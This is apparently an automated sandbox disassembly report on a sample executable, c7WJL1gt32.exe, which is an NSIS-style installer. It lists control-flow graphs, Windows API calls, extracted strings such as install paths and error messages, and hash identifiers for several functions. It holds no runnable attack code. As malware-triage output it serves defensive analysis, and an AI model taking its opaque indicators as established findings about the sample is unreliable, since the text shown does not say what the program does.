                                                                                                          • Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 261 403e86-403e98 262 403fd9-403fe8 261->262 263 403e9e-403ea4 261->263 265 404037-40404c 262->265 266 403fea-404032 GetDlgItem * 2 call 40435f SetClassLongW call 40140b 262->266 263->262 264 403eaa-403eb3 263->264 269 403eb5-403ec2 SetWindowPos 264->269 270 403ec8-403ecb 264->270 267 40408c-404091 call 4043ab 265->267 268 40404e-404051 265->268 266->265 283 404096-4040b1 267->283 272 404053-40405e call 401389 268->272 273 404084-404086 268->273 269->270 275 403ee5-403eeb 270->275 276 403ecd-403edf ShowWindow 270->276 272->273 294 404060-40407f SendMessageW 272->294 273->267 282 40432c 273->282 278 403f07-403f0a 275->278 279 403eed-403f02 DestroyWindow 275->279 276->275 287 403f0c-403f18 SetWindowLongW 278->287 288 403f1d-403f23 278->288 284 404309-40430f 279->284 286 40432e-404335 282->286 290 4040b3-4040b5 call 40140b 283->290 291 4040ba-4040c0 283->291 284->282 296 404311-404317 284->296 287->286 292 403fc6-403fd4 call 4043c6 288->292 293 403f29-403f3a GetDlgItem 288->293 290->291 297 4040c6-4040d1 291->297 298 4042ea-404303 DestroyWindow EndDialog 291->298 292->286 300 403f59-403f5c 293->300 301 403f3c-403f53 SendMessageW IsWindowEnabled 293->301 294->286 296->282 303 404319-404322 ShowWindow 296->303 297->298 299 4040d7-404124 call 40640a call 40435f * 3 GetDlgItem 297->299 298->284 331 404126-40412b 299->331 332 40412e-40416a ShowWindow KiUserCallbackDispatcher call 404381 EnableWindow 299->332 305 403f61-403f64 300->305 306 403f5e-403f5f 300->306 301->282 301->300 303->282 310 403f72-403f77 305->310 311 403f66-403f6c 305->311 309 403f8f-403f94 call 404338 306->309 309->292 314 403fad-403fc0 SendMessageW 310->314 316 403f79-403f7f 310->316 311->314 315 403f6e-403f70 311->315 314->292 315->309 319 403f81-403f87 call 40140b 316->319 320 403f96-403f9f call 40140b 316->320 327 403f8d 319->327 320->292 329 403fa1-403fab 320->329 327->309 329->327 331->332 335 40416c-40416d 332->335 336 40416f 332->336 337 404171-40419f GetSystemMenu EnableMenuItem SendMessageW 335->337 336->337 338 4041a1-4041b2 SendMessageW 337->338 339 4041b4 337->339 340 4041ba-4041f9 call 404394 call 403e67 call 4063e8 lstrlenW call 40640a SetWindowTextW call 401389 338->340 339->340 340->283 351 4041ff-404201 340->351 351->283 352 404207-40420b 351->352 353 40422a-40423e DestroyWindow 352->353 354 40420d-404213 352->354 353->284 356 404244-404271 CreateDialogParamW 353->356 354->282 355 404219-40421f 354->355 355->283 357 404225 355->357 356->284 358 404277-4042ce call 40435f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 356->358 357->282 358->282 363 4042d0-4042e8 ShowWindow call 4043ab 358->363 363->284
                                                                                                          APIs
                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                                                                          • ShowWindow.USER32(?), ref: 00403EDF
                                                                                                          • DestroyWindow.USER32 ref: 00403EF3
                                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                                                                          • GetDlgItem.USER32(?,?), ref: 00403F30
                                                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00403FF9
                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                                                                          • ShowWindow.USER32(00000000,?), ref: 00404135
                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404147
                                                                                                          • EnableWindow.USER32(?,?), ref: 00404162
                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
                                                                                                          • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                                                                          • SendMessageW.USER32(?,?,00000000,00000001), ref: 00404197
                                                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                                                                          • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
                                                                                                          • SetWindowTextW.USER32(?,00423728), ref: 004041E8
                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                          • String ID: (7B
                                                                                                          • API String ID: 3282139019-3251261122
                                                                                                          • Opcode ID: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
                                                                                                          • Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
                                                                                                          • Opcode Fuzzy Hash: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
                                                                                                          • Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 366 403ad8-403af0 call 4067c2 369 403af2-403b02 call 40632f 366->369 370 403b04-403b3b call 4062b6 366->370 379 403b5e-403b87 call 403dae call 405dc5 369->379 375 403b53-403b59 lstrcatW 370->375 376 403b3d-403b4e call 4062b6 370->376 375->379 376->375 384 403c19-403c21 call 405dc5 379->384 385 403b8d-403b92 379->385 391 403c23-403c2a call 40640a 384->391 392 403c2f-403c54 LoadImageW 384->392 385->384 386 403b98-403bb2 call 4062b6 385->386 390 403bb7-403bc0 386->390 390->384 393 403bc2-403bc6 390->393 391->392 395 403cd5-403cdd call 40140b 392->395 396 403c56-403c86 RegisterClassW 392->396 397 403bd8-403be4 lstrlenW 393->397 398 403bc8-403bd5 call 405cea 393->398 407 403ce7-403cf2 call 403dae 395->407 408 403cdf-403ce2 395->408 399 403da4 396->399 400 403c8c-403cd0 SystemParametersInfoW CreateWindowExW 396->400 405 403be6-403bf4 lstrcmpiW 397->405 406 403c0c-403c14 call 405cbd call 4063e8 397->406 398->397 404 403da6-403dad 399->404 400->395 405->406 411 403bf6-403c00 GetFileAttributesW 405->411 406->384 419 403cf8-403d12 ShowWindow call 406752 407->419 420 403d7b-403d83 call 405523 407->420 408->404 414 403c02-403c04 411->414 415 403c06-403c07 call 405d09 411->415 414->406 414->415 415->406 427 403d14-403d19 call 406752 419->427 428 403d1e-403d30 GetClassInfoW 419->428 425 403d85-403d8b 420->425 426 403d9d-403d9f call 40140b 420->426 425->408 429 403d91-403d98 call 40140b 425->429 426->399 427->428 432 403d32-403d42 GetClassInfoW RegisterClassW 428->432 433 403d48-403d6b DialogBoxParamW call 40140b 428->433 429->408 432->433 437 403d70-403d79 call 403a28 433->437 437->404
                                                                                                          APIs
                                                                                                            • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,?,?,00403517,0000000A), ref: 004067D4
                                                                                                            • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                          • lstrcatW.KERNEL32(1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\,74DF3420,00435000,00000000), ref: 00403B59
                                                                                                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,00435800,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403BD9
                                                                                                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,00435800,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
                                                                                                          • GetFileAttributesW.KERNEL32(Call), ref: 00403BF7
                                                                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403C40
                                                                                                            • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                          • RegisterClassW.USER32(004291E0), ref: 00403C7D
                                                                                                          • SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403C95
                                                                                                          • CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
                                                                                                          • RegisterClassW.USER32(004291E0), ref: 00403D42
                                                                                                          • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                          • String ID: (7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                          • API String ID: 1975747703-2335571965
                                                                                                          • Opcode ID: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
                                                                                                          • Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
                                                                                                          • Opcode Fuzzy Hash: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
                                                                                                          • Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 440 402f30-402f7e GetTickCount GetModuleFileNameW call 405ede 443 402f80-402f85 440->443 444 402f8a-402fb8 call 4063e8 call 405d09 call 4063e8 GetFileSize 440->444 445 4031cf-4031d3 443->445 452 4030a8-4030b6 call 402e8e 444->452 453 402fbe-402fd5 444->453 460 403187-40318c 452->460 461 4030bc-4030bf 452->461 454 402fd7 453->454 455 402fd9-402fe6 call 403447 453->455 454->455 462 403143-40314b call 402e8e 455->462 463 402fec-402ff2 455->463 460->445 464 4030c1-4030d9 call 40345d call 403447 461->464 465 4030eb-403137 GlobalAlloc call 406923 call 405f0d CreateFileW 461->465 462->460 467 403072-403076 463->467 468 402ff4-40300c call 405e99 463->468 464->460 488 4030df-4030e5 464->488 491 403139-40313e 465->491 492 40314d-40317d call 40345d call 4031d6 465->492 472 403078-40307e call 402e8e 467->472 473 40307f-403085 467->473 468->473 486 40300e-403015 468->486 472->473 479 403087-403095 call 4068b5 473->479 480 403098-4030a2 473->480 479->480 480->452 480->453 486->473 490 403017-40301e 486->490 488->460 488->465 490->473 493 403020-403027 490->493 491->445 499 403182-403185 492->499 493->473 496 403029-403030 493->496 496->473 498 403032-403052 496->498 498->460 500 403058-40305c 498->500 499->460 501 40318e-40319f 499->501 502 403064-40306c 500->502 503 40305e-403062 500->503 505 4031a1 501->505 506 4031a7-4031ac 501->506 502->473 504 40306e-403070 502->504 503->452 503->502 504->473 505->506 507 4031ad-4031b3 506->507 507->507 508 4031b5-4031cd call 405e99 507->508 508->445
                                                                                                          APIs
                                                                                                          • GetTickCount.KERNEL32 ref: 00402F44
                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\c7WJL1gt32.exe,00000400), ref: 00402F60
                                                                                                            • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\c7WJL1gt32.exe,80000000,00000003), ref: 00405EE2
                                                                                                            • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\c7WJL1gt32.exe,C:\Users\user\Desktop\c7WJL1gt32.exe,80000000,00000003), ref: 00402FA9
                                                                                                          • GlobalAlloc.KERNELBASE(?,0040A230), ref: 004030F0
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\c7WJL1gt32.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                          • API String ID: 2803837635-541215006
                                                                                                          • Opcode ID: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                                                                          • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                                                                                          • Opcode Fuzzy Hash: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                                                                          • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 724 40640a-406415 725 406417-406426 724->725 726 406428-40643e 724->726 725->726 727 406444-406451 726->727 728 406656-40665c 726->728 727->728 731 406457-40645e 727->731 729 406662-40666d 728->729 730 406463-406470 728->730 733 406678-406679 729->733 734 40666f-406673 call 4063e8 729->734 730->729 732 406476-406482 730->732 731->728 735 406643 732->735 736 406488-4064c6 732->736 734->733 740 406651-406654 735->740 741 406645-40664f 735->741 738 4065e6-4065ea 736->738 739 4064cc-4064d7 736->739 744 4065ec-4065f2 738->744 745 40661d-406621 738->745 742 4064f0 739->742 743 4064d9-4064de 739->743 740->728 741->728 751 4064f7-4064fe 742->751 743->742 748 4064e0-4064e3 743->748 749 406602-40660e call 4063e8 744->749 750 4065f4-406600 call 40632f 744->750 746 406630-406641 lstrlenW 745->746 747 406623-40662b call 40640a 745->747 746->728 747->746 748->742 753 4064e5-4064e8 748->753 762 406613-406619 749->762 750->762 755 406500-406502 751->755 756 406503-406505 751->756 753->742 758 4064ea-4064ee 753->758 755->756 760 406540-406543 756->760 761 406507-40652e call 4062b6 756->761 758->751 763 406553-406556 760->763 764 406545-406551 GetSystemDirectoryW 760->764 775 406534-40653b call 40640a 761->775 776 4065ce-4065d1 761->776 762->746 766 40661b 762->766 768 4065c1-4065c3 763->768 769 406558-406566 GetWindowsDirectoryW 763->769 767 4065c5-4065c9 764->767 771 4065de-4065e4 call 40667c 766->771 767->771 772 4065cb 767->772 768->767 774 406568-406572 768->774 769->768 771->746 772->776 780 406574-406577 774->780 781 40658c-4065a2 SHGetSpecialFolderLocation 774->781 775->767 776->771 778 4065d3-4065d9 lstrcatW 776->778 778->771 780->781 783 406579-406580 780->783 784 4065a4-4065bb SHGetPathFromIDListW CoTaskMemFree 781->784 785 4065bd 781->785 786 406588-40658a 783->786 784->767 784->785 785->768 786->767 786->781
                                                                                                          APIs
                                                                                                          • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040654B
                                                                                                          • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
                                                                                                          • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
                                                                                                          • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 004065A8
                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                                                                          • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                                                                          • lstrlenW.KERNEL32(Call,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                          • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                          • API String ID: 717251189-1230650788
                                                                                                          • Opcode ID: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
                                                                                                          • Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
                                                                                                          • Opcode Fuzzy Hash: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
                                                                                                          • Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 851 40176f-401794 call 402c41 call 405d34 856 401796-40179c call 4063e8 851->856 857 40179e-4017b0 call 4063e8 call 405cbd lstrcatW 851->857 862 4017b5-4017b6 call 40667c 856->862 857->862 866 4017bb-4017bf 862->866 867 4017c1-4017cb call 40672b 866->867 868 4017f2-4017f5 866->868 876 4017dd-4017ef 867->876 877 4017cd-4017db CompareFileTime 867->877 869 4017f7-4017f8 call 405eb9 868->869 870 4017fd-401819 call 405ede 868->870 869->870 878 40181b-40181e 870->878 879 40188d-4018b6 call 405450 call 4031d6 870->879 876->868 877->876 880 401820-40185e call 4063e8 * 2 call 40640a call 4063e8 call 405a4e 878->880 881 40186f-401879 call 405450 878->881 893 4018b8-4018bc 879->893 894 4018be-4018ca SetFileTime 879->894 880->866 913 401864-401865 880->913 891 401882-401888 881->891 896 402ace 891->896 893->894 895 4018d0-4018db CloseHandle 893->895 894->895 899 4018e1-4018e4 895->899 900 402ac5-402ac8 895->900 898 402ad0-402ad4 896->898 902 4018e6-4018f7 call 40640a lstrcatW 899->902 903 4018f9-4018fc call 40640a 899->903 900->896 910 401901-4022fc call 405a4e 902->910 903->910 910->898 913->891 915 401867-401868 913->915 915->881
                                                                                                          APIs
                                                                                                          • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Iw\Bombestoppets,?,?,00000031), ref: 004017B0
                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Iw\Bombestoppets,?,?,00000031), ref: 004017D5
                                                                                                            • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,?,0000000A), ref: 004063F5
                                                                                                            • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                            • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                            • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                            • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                          • String ID: C:\Users\user\AppData\Local\Iw\Bombestoppets$C:\Users\user\AppData\Local\Temp\nse90B2.tmp$C:\Users\user\AppData\Local\Temp\nse90B2.tmp\System.dll$Call
                                                                                                          • API String ID: 1941528284-3493626618
                                                                                                          • Opcode ID: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
                                                                                                          • Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
                                                                                                          • Opcode Fuzzy Hash: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
                                                                                                          • Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 917 40264a-402663 call 402c1f 920 402ac5-402ac8 917->920 921 402669-402670 917->921 922 402ace-402ad4 920->922 923 402672 921->923 924 402675-402678 921->924 923->924 926 4027dc-4027e4 924->926 927 40267e-40268d call 406348 924->927 926->920 927->926 930 402693 927->930 931 402699-40269d 930->931 932 402732-402735 931->932 933 4026a3-4026be ReadFile 931->933 934 402737-40273a 932->934 935 40274d-40275d call 405f61 932->935 933->926 936 4026c4-4026c9 933->936 934->935 937 40273c-402747 call 405fbf 934->937 935->926 945 40275f 935->945 936->926 939 4026cf-4026dd 936->939 937->926 937->935 940 4026e3-4026f5 MultiByteToWideChar 939->940 941 402798-4027a4 call 40632f 939->941 944 4026f7-4026fa 940->944 940->945 941->922 948 4026fc-402707 944->948 950 402762-402765 945->950 948->950 951 402709-40272e SetFilePointer MultiByteToWideChar 948->951 950->941 952 402767-40276c 950->952 951->948 955 402730 951->955 953 4027a9-4027ad 952->953 954 40276e-402773 952->954 957 4027ca-4027d6 SetFilePointer 953->957 958 4027af-4027b3 953->958 954->953 956 402775-402788 954->956 955->945 956->926 959 40278a-402790 956->959 957->926 960 4027b5-4027b9 958->960 961 4027bb-4027c8 958->961 959->931 962 402796 959->962 960->957 960->961 961->926 962->926
                                                                                                          APIs
                                                                                                          • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000001), ref: 004026F1
                                                                                                          • SetFilePointer.KERNELBASE(?,?,?,00000001,?,?,?,?,?,00000001), ref: 00402714
                                                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,00000001,?,00000001,?,?,?,?,?,00000001), ref: 0040272A
                                                                                                            • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5
                                                                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                          • String ID: 9
                                                                                                          • API String ID: 163830602-2366072709
                                                                                                          • Opcode ID: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                                                                                          • Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
